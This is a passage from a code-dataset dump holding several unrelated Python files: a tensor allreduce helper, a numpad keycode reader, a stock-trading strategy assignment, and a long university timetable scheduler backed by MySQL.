Sequence[torch.Size]) -> Tuple[torch.Tensor, ...]:\n \"\"\" restores the original tensor shapes from chunks obtained by split_into_chunks \"\"\"\n flat_tensor = torch.cat(tuple(chunks))\n result_sizes = tuple(map(torch.Size.numel, shapes))\n flat_original_tensors = torch.split_with_sizes(flat_tensor, result_sizes)\n return tuple(map(torch.Tensor.reshape, flat_original_tensors, shapes))\n\n\nclass AllreduceException(Exception):\n \"\"\" A special exception that is raised when allreduce can't continue normally (e.g. disbanded/bad request/etc) \"\"\"\n","sub_path":"hivemind/client/averaging/allreduce.py","file_name":"allreduce.py","file_ext":"py","file_size_in_byte":13771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"514904761","text":"#!/usr/bin/env python3\nfrom evdev import ecodes, InputDevice, categorize\n\nnumpad = InputDevice('/dev/input/event0')\nprint(numpad)\nnumpad.grab()\nfor event in numpad.read_loop():\n if event.type == ecodes.EV_KEY:\n press = categorize(event)\n if press.keystate == 1:\n print(press.keycode)\n \n","sub_path":"get-typing.py","file_name":"get-typing.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"245353106","text":"from util import get_data\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nfrom marketsimcode import compute_portvals\nimport matplotlib.pyplot as plt\nfrom indicators import sma, bb\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\ndef author():\n return 'akarthik3'\n\ndef testPolicy(symbol = 'JPM', sd = dt.datetime(2008, 1, 1), ed = dt.datetime(2009, 12, 31), sv = 100000):\n prices = get_data([symbol], pd.date_range(sd, ed))[symbol]\n\n priceSMA = prices / sma(prices)\n BB = bb(prices)\n\n # Decide order types based on price-to-SMA ratio and calculated Bollinger value\n orders = prices.copy()\n orders[:] = 0\n orders[(priceSMA > 1.02) & (BB > 1)] = -1\n orders[(priceSMA < 0.98) & (BB < 0)] = 1\n\n trades = []\n for date in orders.index: trades.append((date, orders.loc[date] * 1000))\n\n tradesDataframe = pd.DataFrame(trades, columns = [\"Date\", \"Shares\"])\n tradesDataframe.set_index(\"Date\", inplace = True)\n\n return tradesDataframe\n\nif __name__ == \"__main__\":\n benchmarkPrices = get_data(['JPM'], pd.date_range(dt.datetime(2008, 1, 1), dt.datetime(2009, 12, 31)))['JPM']\n # benchmarkPrices = get_data(['JPM'], pd.date_range(dt.datetime(2010, 1, 1), dt.datetime(2011, 12, 31)))['JPM']\n\n benchmarkTrades = np.zeros(len(benchmarkPrices.index))\n benchmarkTrades[0] = 1000\n benchmarkTrades = pd.DataFrame(data = benchmarkTrades, index = benchmarkPrices.index, columns = ['Shares'])\n\n benchmarkPortvals, benchmarkCR, benchmarkMean, benchmarkSTD = compute_portvals(benchmarkTrades, 100000, 0.0, 0.0)\n normalizedBenchmark = benchmarkPortvals / benchmarkPortvals.iloc[0]\n\n trades = testPolicy()\n # trades = testPolicy(sd = dt.datetime(2010, 1, 1), ed = dt.datetime(2011, 12, 31))\n\n optimalPortvals, optimalCR, optimalMean, optimalSTD = compute_portvals(trades, 100000, 0.0, 0.0)\n normalizedOptimal = optimalPortvals / optimalPortvals.iloc[0]\n\n print(\"Benchmark CR: \", benchmarkCR)\n print(\"Benchmark ADR: \", benchmarkMean)\n print(\"Benchmark SDDR: \", benchmarkSTD)\n print(\"Optimal CR: \", optimalCR)\n print(\"Optimal ADR: \", optimalMean)\n print(\"Optimal SDDR: \", optimalSTD)\n\n plt.title(\"Benchmark vs. Manual Strategy\")\n plt.xlabel(\"Dates\")\n plt.ylabel(\"Normalized Value of Portfolio\")\n plt.plot(normalizedBenchmark, 'g', label=\"Benchmark\")\n plt.plot(normalizedOptimal, 'r', label = \"Manual\")\n plt.legend()\n\n prev = 0\n for day, order in trades.iterrows():\n if order['Shares'] - prev < 0 and order['Shares'] < 0: # SHORT\n plt.axvline(day, color = \"k\", alpha = 0.5)\n elif order['Shares'] - prev > 0 and order['Shares'] > 0: # LONG\n plt.axvline(day, color = \"b\", alpha = 0.5)\n prev = order['Shares']\n\n plt.savefig(\"Manual.png\")\n # plt.savefig(\"ManualOutOfSample.png\")\n plt.clf()","sub_path":"manual_strategy/ManualStrategy.py","file_name":"ManualStrategy.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"261396806","text":"import pymysql\n\ndef call_data():\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tteacher_name = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_account`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in range(num):\n\t\tteacher_name.append(data[i][1])\n\t#for i in teacher_name:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tteacher_busy = [[]for i in range(len(teacher_name))]\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_teacher`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in range(len(teacher_name)):\n\t\tfor o in range(num):\n\t\t\tif teacher_name[i] == data[o][1]:\n\t\t\t\tteacher_busy[i].append(data[o][2]+data[o][3])\n\t#for i in teacher_busy:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tnum1 = 0\n\tdata = []\n\tsubject_description = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_subject_description_output` ORDER BY `table_subject_description_output`.`subject_code` ASC'\n\t\t\tnum = cur.execute(sql)\n\n\t\t\tsql ='SELECT * FROM `table_subject_description_input`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\n\t\t\tsql ='SELECT * FROM `table_teacher_subject`'\n\t\t\tnum1 = cur.execute(sql)\n\t\t\t#print (\"num: \",num1)\n\t\t\tdata1 = cur.fetchall()\n\t\t\t#print (data1)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in data:\n\t\tsub = []\n\t\tteacher = \"\"\n\t\tfor o in data1:\n\t\t\tif i[2] == o[2]:\n\t\t\t\tteacher = teacher + o[1] + \",\"\n\t\t\t\t#print (o[1]+\"_\"+o[2])\n\t\tif teacher == \"\":\n\t\t\tteacher = \"teacher,\"\n\t\tsub.append(i[2])\n\t\tsub.append(i[1])\n\t\tsub.append(teacher)\n\t\tsub.append(i[5])\n\t\tsub.append(i[6])\n\t\tsub.append(i[7])\n\t\tsubject_description.append(sub)\n\t#for i in subject_description:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tcenter_subject = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_fundamental_subjects`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in data:\n\t\ttime = []\n\t\tt1 = i[6]+i[7]\n\t\tt2 = i[6]+i[8]\n\t\tif t1 == t2:\n\t\t\ttime.append(t1)\n\t\telif int(i[7])+1 == int(i[8]):\n\t\t\ttime.append(t1)\n\t\t\ttime.append(t2)\n\t\telif int(i[7])+2 == int(i[8]):\n\t\t\tt = int(i[7])+1\n\t\t\ttime.append(t1)\n\t\t\ttime.append(i[6]+str(t))\n\t\t\ttime.append(t2)\n\t\tsplit_center = []\n\t\tsplit_center.append(i[2])\n\t\tsplit_center.append(i[1])\n\t\tsplit_center.append(i[5])\n\t\tsplit_center.append(time)\n\t\tcenter_subject.append(split_center)\n\t#for i in center_subject:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\troom_code = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_room`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in range(num):\n\t\troom_code.append(data[i][1])\n\t#for i in room_code:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\n\tlst_data = [teacher_name,teacher_busy,subject_description,center_subject,room_code]\n\n\treturn (lst_data)\n\ndef save_output(output):\n\tset_data = []\n\tcount = 0\n\tfor i in output[0]:\n\t\tday0 = 0\n\t\tday1 = 0\n\t\tday2 = 0\n\t\tday3 = 0\n\t\tday4 = 0\n\t\tcheck_day0 = 0\n\t\tcheck_day1 = 0\n\t\tcheck_day2 = 0\n\t\tcheck_day3 = 0\n\t\tcheck_day4 = 0\n\t\tstart_time = []\n\t\tday = []\n\t\tfor o in range(len(i[6])):\n\t\t\tif i[6][o][0] == \"0\":\n\t\t\t\tday0 += 1\n\t\t\t\tif check_day0 == 0:\n\t\t\t\t\tcheck_day0 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"1\":\n\t\t\t\tday1 += 1\n\t\t\t\tif check_day1 == 0:\n\t\t\t\t\tcheck_day1 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"2\":\n\t\t\t\tday2 += 1\n\t\t\t\tif check_day2 == 0:\n\t\t\t\t\tcheck_day2 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"3\":\n\t\t\t\tday3 += 1\n\t\t\t\tif check_day3 == 0:\n\t\t\t\t\tcheck_day3 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"4\":\n\t\t\t\tday4 += 1\n\t\t\t\tif check_day4 == 0:\n\t\t\t\t\tcheck_day4 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\n\t\tsum_day = [day0,day1,day2,day3,day4]\n\t\tfor a in sum_day:\n\t\t\tif a != 0:\n\t\t\t\tday.append(a)\n\n\t\tfor o in range(len(day)):\n\t\t\tcount += 1\n\t\t\tsplit_data = []\n\t\t\tsplit_data.append(count)\n\t\t\tsplit_data.append(i[1])\n\t\t\tsplit_data.append(i[0])\n\t\t\tsplit_data.append(i[5])\n\t\t\tsplit_data.append(i[3])\n\t\t\tsplit_data.append(day[o])\n\t\t\tif i[4][0] == i[4][1]:\n\t\t\t\tsplit_data.append(i[4][0])\n\t\t\telse :\n\t\t\t\tsplit_data.append(i[4])\n\t\t\tsplit_data.append(start_time[o][0])\n\t\t\tsplit_data.append(start_time[o][1])\n\t\t\tset_data.append(split_data)\n\t\t\t#print (split_data)\n\n\tfor i in output[1]:\n\t\tday0 = 0\n\t\tday1 = 0\n\t\tday2 = 0\n\t\tday3 = 0\n\t\tday4 = 0\n\t\tcheck_day0 = 0\n\t\tcheck_day1 = 0\n\t\tcheck_day2 = 0\n\t\tcheck_day3 = 0\n\t\tcheck_day4 = 0\n\t\tstart_time = []\n\t\tday = []\n\t\tfor o in range(len(i[3])):\n\t\t\tif i[3][o][0] == \"0\":\n\t\t\t\tday0 += 1\n\t\t\t\tif check_day0 == 0:\n\t\t\t\t\tcheck_day0 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"1\":\n\t\t\t\tday1 += 1\n\t\t\t\tif check_day1 == 0:\n\t\t\t\t\tcheck_day1 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"2\":\n\t\t\t\tday2 += 1\n\t\t\t\tif check_day2 == 0:\n\t\t\t\t\tcheck_day2 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"3\":\n\t\t\t\tday3 += 1\n\t\t\t\tif check_day3 == 0:\n\t\t\t\t\tcheck_day3 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"4\":\n\t\t\t\tday4 += 1\n\t\t\t\tif check_day4 == 0:\n\t\t\t\t\tcheck_day4 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\n\t\tsum_day = [day0,day1,day2,day3,day4]\n\t\tfor a in sum_day:\n\t\t\tif a != 0:\n\t\t\t\tday.append(a)\n\n\t\tfor o in range(len(day)):\n\t\t\tcount += 1\n\t\t\tsplit_data = []\n\t\t\tsplit_data.append(count)\n\t\t\tsplit_data.append(i[1])\n\t\t\tsplit_data.append(i[0])\n\t\t\tsplit_data.append(\"-\")\n\t\t\tsplit_data.append(\"-\")\n\t\t\tsplit_data.append(day[o])\n\t\t\tif i[2][0] == i[2][1]:\n\t\t\t\tsplit_data.append(i[2][0])\n\t\t\telse :\n\t\t\t\tsplit_data.append(i[2])\n\t\t\tsplit_data.append(start_time[o][0])\n\t\t\tsplit_data.append(start_time[o][1])\n\t\t\tset_data.append(split_data)\n\t\t\t#print (split_data)\n\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql = \"DROP TABLE IF EXISTS `table_subject_description_output`\"\n\t\t\tcur.execute(sql)\n\t\n\t\t\tsql = \"\"\"CREATE TABLE IF NOT EXISTS `table_subject_description_output` (\n\t\t\t `No` int(100) NOT NULL,\n\t\t\t `subject_level` varchar(100) NOT NULL,\n\t\t\t `subject_code` varchar(100) NOT NULL,\n\t\t\t `subject_room` varchar(100) NOT NULL,\n\t\t\t `subject_hour_per_week` varchar(100) NOT NULL,\n\t\t\t `subject_hour_per_day` varchar(100) NOT NULL,\n\t\t\t `subject_sec` varchar(100) NOT NULL,\n\t\t\t `Day` varchar(100) NOT NULL,\n\t\t\t `start_time` varchar(100) NOT NULL\n\t\t\t) ENGINE=InnoDB DEFAULT CHARSET=utf8;\"\"\"\n\t\t\tcur.execute(sql)\n\n\t\t\tfor i in set_data:\n\t\t\t\tNo = i[0]\n\t\t\t\tsubject_level = i[1]\n\t\t\t\tsubject_code = i[2]\n\t\t\t\tsubject_room = i[3]\n\t\t\t\tsubject_hour_per_week = i[4]\n\t\t\t\tsubject_hour_per_day = i[5]\n\t\t\t\tsubject_sec = i[6]\n\t\t\t\tDay = i[7]\n\t\t\t\tstart_time = i[8]\n\t\t\t\tsql = \"\"\"INSERT INTO `table_subject_description_output` (`No`, `subject_level`, `subject_code`, `subject_room`, `subject_hour_per_week`, `subject_hour_per_day`, `subject_sec`, `Day`, `start_time`)\n\t\t\t\t\t\tVALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s')\"\"\" %(No,subject_level,subject_code,subject_room,subject_hour_per_week,subject_hour_per_day,subject_sec,Day,start_time)\n\t\t\t\tcur.execute(sql)\n\t\t\tconn.commit()\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\ndef print_timetable(table,name):\n\ts = \" | \"\n\td = 0\n\tfor A in table:\n\t\td += 1\n\t\tprint (str(d)+\")\"+name[d-1]+\"\\n\")\n\t\tprint (\"|-----|---------------------------------------------------------------------------------------------------------------------------------|\")\n\t\tprint (\"| | TIME |\")\n\t\tprint (\"| DAY |---------------------------------------------------------------------------------------------------------------------------------|\")\n\t\tprint (\"| |08.30-09.30 |09.30-10.30 |10.30-11.30 |11.30-12.30 |12.30-13.30 |13.30-14.30 |14.30-15.30 |15.30-16.30 |16.30-17.30 |17.30-18.30 |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| MON | \"+A[0][0]+s+A[0][1]+s+A[0][2]+s+A[0][3]+s+A[0][4]+s+A[0][5]+s+A[0][6]+s+A[0][7]+s+A[0][8]+s+A[0][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| TUE | \"+A[1][0]+s+A[1][1]+s+A[1][2]+s+A[1][3]+s+A[1][4]+s+A[1][5]+s+A[1][6]+s+A[1][7]+s+A[1][8]+s+A[1][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| WED | \"+A[2][0]+s+A[2][1]+s+A[2][2]+s+A[2][3]+s+A[2][4]+s+A[2][5]+s+A[2][6]+s+A[2][7]+s+A[2][8]+s+A[2][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| THU | \"+A[3][0]+s+A[3][1]+s+A[3][2]+s+A[3][3]+s+A[3][4]+s+A[3][5]+s+A[3][6]+s+A[3][7]+s+A[3][8]+s+A[3][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| FRI | \"+A[4][0]+s+A[4][1]+s+A[4][2]+s+A[4][3]+s+A[4][4]+s+A[4][5]+s+A[4][6]+s+A[4][7]+s+A[4][8]+s+A[4][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\t#print (\"| SAT | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 |\")\n\t\t#print (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"\\n\")\ndef sub_do_not_use_this_time(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable):\n\tsubject_do_not_use_this_time = []\n\tsubject = subject_description[i]\n\tall_teacher = subject[2].split(\",\")\n\tFREE = \" \"\n\t#Check from teacher\n\tfor a in range(len(teacher_name)):\n\t\tfor b in range(len(all_teacher)-1): \n\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\tfor o in range(5):\n\t\t\t\t\tfor u in range(10):\n\t\t\t\t\t\tif timetable_teacher[a][o][u] != FREE:\n\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\tfor e in subject_do_not_use_this_time:\n\t\t\t\t\t\t\t\tif e == timetable[o][u]:\n\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\n\t#Check from MIX_SCHEDULE\n\tlevel = subject[1]\n\tif level == \"1\":\n\t\tA = MIX_SCHEDULE[0]\n\t\tB = MIX_SCHEDULE[1]\n\telif level == \"2\":\n\t\tA = MIX_SCHEDULE[2]\n\t\tB = MIX_SCHEDULE[3]\n\telif level == \"3\":\n\t\tA = MIX_SCHEDULE[4]\n\t\tB = MIX_SCHEDULE[5]\n\telif level == \"4\":\n\t\tA = MIX_SCHEDULE[6]\n\t\tB = MIX_SCHEDULE[7]\n\telif level == \"M\":\n\t\tC = MIX_SCHEDULE[8]\n\telif level == \"D\":\n\t\tC = MIX_SCHEDULE[9]\n\n\tfor o in range(5):\n\t\tfor u in range(10):\n\t\t\tcheck = 0\n\t\t\tfor e in subject_do_not_use_this_time:\n\t\t\t\tif e == timetable[o][u]:\n\t\t\t\t\tcheck = 1\n\t\t\tif check == 0:\n\t\t\t\tif subject[4] == \"AB\" and (A[o][u] != FREE or B[o][u] != FREE):\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\t\t\telif subject[4] == \"AA\" and A[o][u] != FREE:\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\t\t\telif subject[4] == \"BB\" and B[o][u] != FREE:\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\t\t\telif subject[4] == \"CC\" and C[o][u] != FREE:\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\n\t#Check from room_code\n\tfor a in range(len(room_code)):\n\t\tif subject[5] == room_code[a]:\n\t\t\tfor o in range(5):\n\t\t\t\tfor u in range(10):\n\t\t\t\t\tif timetable_room[a][o][u] != FREE:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\tfor e in subject_do_not_use_this_time:\n\t\t\t\t\t\t\tif e == timetable[o][u]:\n\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\n\tsubject_do_not_use_this_time = sorted(subject_do_not_use_this_time)\n\n\treturn (subject_do_not_use_this_time)\n\ndef manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable,subject_do_not_use_this_time = None):\n\tsubject = subject_description[i]\n\tall_teacher = subject[2].split(\",\")\n\tlevel = subject[1]\n\tsec = subject[4]\n\tsubject_do_not_use_this_time = []\n\tFREE = \" \"\n\tday = [\"0\",\"1\",\"2\",\"3\",\"4\"]\n\thr = [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\n\thr_1 = [[\"1\"],[\"2\"],[\"3\"],[\"5\"],[\"6\"],[\"7\"],[\"8\"]]\n\thr_2 = [[\"0\",\"1\"],[\"1\",\"2\"],[\"2\",\"3\"],[\"5\",\"6\"],[\"6\",\"7\"],[\"7\",\"8\"]]\n\thr_3 = [[\"1\",\"2\",\"3\"],[\"5\",\"6\",\"7\"],[\"6\",\"7\",\"8\"]]\n\thr_3_1 = [[\"0\",\"1\",\"2\"],[\"4\",\"5\",\"6\"],[\"5\",\"6\",\"7\"],[\"6\",\"7\",\"8\"]]\n\n\tif level == \"1\":\n\t\tA = 0\n\t\tB = 1\n\telif level == \"2\":\n\t\tA = 2\n\t\tB = 3\n\telif level == \"3\":\n\t\tA = 4\n\t\tB = 5\n\telif level == \"4\":\n\t\tA = 6\n\t\tB = 7\n\telif level == \"M\":\n\t\tC = 8\n\telif level == \"D\":\n\t\tC = 9\n\n\t#Update MIX_SCHEDULE\n\tif len(subject[3]) == 1:\n\t\tT = [subject[3]]\n\telse:\n\t\tT = subject[3].split(\"/\")\n\n\tfor t in range(len(T)):\n\t\tfinish = 0\n\t\tcheck_freeday = 0\n\t\twhile finish != 5:\n\t\t\t#print (all_teacher)\n\t\t\tsubject_do_not_use_this_time = sub_do_not_use_this_time(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\t\tFREE_TIME = [[],[],[],[],[]]\n\n\t\t\t#print (str(t)+\"_\"+subject[0]+\"_\"+sec)\n\n\t\t\t\"\"\"if finish == 1 or finish == 2 :\n\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\tprint (teacher_name[a])\n\t\t\t\t\t\t\tprint (\"\\n\")\n\t\t\t\t\t\t\tprint (timetable_teacher[a])\n\t\t\t\t\t\t\tprint (\"\\n\\n\")\n\t\t\t\tprint (subject_do_not_use_this_time)\n\n\t\t\tif all_teacher == [\"Mr.Bawornsak Sakulkueakulsuk\",\"\"]:\n\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\tif all_teacher[0]==teacher_name[a]:\n\t\t\t\t\t\tprint (subject_do_not_use_this_time)\n\t\t\t\t\t\tprint (timetable_teacher[a])\"\"\"\n\n\t\t\tfor o in range(len(FREE_TIME)):\n\t\t\t\tfor u in range(10):\n\t\t\t\t\tFREE_TIME[o].append(timetable[o][u])\n\t\t\tfor a in range(len(FREE_TIME)):\n\t\t\t\tfor b in range(len(FREE_TIME[a])):\n\t\t\t\t\tfor c in subject_do_not_use_this_time:\n\t\t\t\t\t\tif c == FREE_TIME[a][b]:\n\t\t\t\t\t\t\tFREE_TIME[a][b] = \"xx\"\n\n\t\t\tFREE_TIME_SPRIT = [[],[],[],[],[]]\n\t\t\tFREE_TIME_GROUP = [[],[],[],[],[]]\n\t\t\tfor o in range(len(FREE_TIME)):\n\t\t\t\tif T[t] == \"1\":\n\t\t\t\t\tfor u in range(len(FREE_TIME[o])):\n\t\t\t\t\t\tsplit = []\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u][1])\n\t\t\t\t\t\tFREE_TIME_SPRIT[o].append(split)\n\t\t\t\t\tfor u in range(len(FREE_TIME_SPRIT)):\n\t\t\t\t\t\tfor v in FREE_TIME_SPRIT[u]:\n\t\t\t\t\t\t\tfor w in hr_1:\n\t\t\t\t\t\t\t\tif v == w:\n\t\t\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\t\t\tfor e in FREE_TIME_GROUP[u]:\n\t\t\t\t\t\t\t\t\t\tif e == v:\n\t\t\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u].append(v)\n\t\t\t\t\t\tif check_freeday == 0 and sec == \"AA\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) <= 2:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\t\t\t\t\t\telif check_freeday == 0 and sec == \"BB\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) <= 1:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\n\t\t\t\telif T[t] == \"2\":\n\t\t\t\t\tfor u in range(len(FREE_TIME[o])-1):\n\t\t\t\t\t\tsplit = []\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u][1])\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u+1][1])\n\t\t\t\t\t\tFREE_TIME_SPRIT[o].append(split)\n\t\t\t\t\tfor u in range(len(FREE_TIME_SPRIT)):\n\t\t\t\t\t\tfor v in FREE_TIME_SPRIT[u]:\n\t\t\t\t\t\t\tfor w in hr_2:\n\t\t\t\t\t\t\t\tif v == w:\n\t\t\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\t\t\tfor e in FREE_TIME_GROUP[u]:\n\t\t\t\t\t\t\t\t\t\tif e == v:\n\t\t\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u].append(v)\n\n\t\t\t\telif T[t] == \"3\":\n\t\t\t\t\tfor u in range(len(FREE_TIME[o])-2):\n\t\t\t\t\t\tsplit = []\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u][1])\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u+1][1])\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u+2][1])\n\t\t\t\t\t\tFREE_TIME_SPRIT[o].append(split)\n\t\t\t\t\tfor u in range(len(FREE_TIME_SPRIT)):\n\t\t\t\t\t\tfor v in FREE_TIME_SPRIT[u]:\n\t\t\t\t\t\t\tfor w in hr_3:\n\t\t\t\t\t\t\t\tif v == w:\n\t\t\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\t\t\tfor e in FREE_TIME_GROUP[u]:\n\t\t\t\t\t\t\t\t\t\tif e == v:\n\t\t\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u].append(v)\n\t\t\t\t\t\tif check_freeday == 0 and sec == \"AA\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) < 3:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\t\t\t\t\t\telif check_freeday == 0 and sec == \"BB\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) < 2:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\n\t\t\tfor a in range(len(FREE_TIME_GROUP)):\n\t\t\t\tfor o in range(len(FREE_TIME_GROUP[a])):\n\t\t\t\t\tfor u in range(len(FREE_TIME_GROUP[a][o])):\n\t\t\t\t\t\tFREE_TIME_GROUP[a][o][u] = str(a)+FREE_TIME_GROUP[a][o][u]\n\n\t\t\t#print (FREE_TIME_GROUP)\n\t\t\tnum_day = []\n\t\t\tfor z in range(len(FREE_TIME_GROUP)):\n\t\t\t\tif len(FREE_TIME_GROUP[z]) != 0:\n\t\t\t\t\tnum_day.append(z)\n\n\t\t\tsubject_time = []\n\t\t\tif len (num_day) 